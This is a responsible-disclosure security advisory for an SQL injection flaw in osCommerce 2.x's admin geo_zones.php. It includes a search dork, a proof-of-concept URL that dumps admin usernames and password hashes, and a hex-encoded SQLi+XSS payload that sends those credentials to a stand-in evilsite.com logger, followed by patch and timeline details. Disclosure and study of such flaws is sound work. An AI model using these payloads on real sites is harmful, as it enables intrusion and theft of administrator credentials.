# Title: osCommerce v2.x SQL Injection Vulnerability # Dork: Powered by osCommerce # Author: Ahmed Aboul-Ela # Contact: ahmed.aboul3la[at]gmail[dot]com - http://twitter.com/_secgeek # Vendor : http://www.oscommerce.com # Version: v2.3.3.4 (current latest release) and prior versions should be affected too # References: http://www.secgeek.net/oscommerce-v2x-sql-injection-vulnerability - Vulnerable Code snippet in "catalog/admin/geo_zones.php": As we can see at line 139 the GET zID parameter directly concatenated with the sql query without any type of sanitization which leads directly to sql injection vulnerability - Proof of Concept ( dump the admin username and password ): http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select 1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators -- - Exploitation & Attack Scenario: an authenticated admin account is required to successfully exploit the vulnerability but it can be combined with other attack vectors like XSS / CSRF to achieve more dangerous successful remote attack Example to steal the administrator username & password and send it to php logger at "http://evilsite.com/logger.php?log=[ADMIN USER:HASH]" We can use hybrid attack technique ( SQL Injection + XSS ) : http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select 1,2,3,4,5,6,7,concat(0x3c6469762069643d2274657374223e,user_name,0x3d,user_password,0x3c2f6469763e3c7363726970743e646f63756d656e742e6c6f636174696f6e2e687265663d22687474703a2f2f6576696c736974652e636f6d2f6c6f676765722e7068703f6c6f673d222b242822237465737422292e68746d6c28293c2f7363726970743e) from administrators -- - Mitigation: The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now https://github.com/gburton/oscommerce2/commit/e4d90eccd7d9072ebe78da4c38fb048bfe31c902 - Time-Line: Mon, Feb 3, 2014 at 10:17 PM: vulnerability advisory sent to osCommerce Tue, Feb 4, 2014 at 01:14 AM: recevied initial reply from osCommerce Tue, Feb 4, 2014 at 02:06 AM: osCommerce released a quick fix for the vulnerability Thu, Feb 6, 2014 at 05:15 PM: the public responsible disclosure - Credits: Ahmed Aboul-Ela - Information Security Consultant @ Starware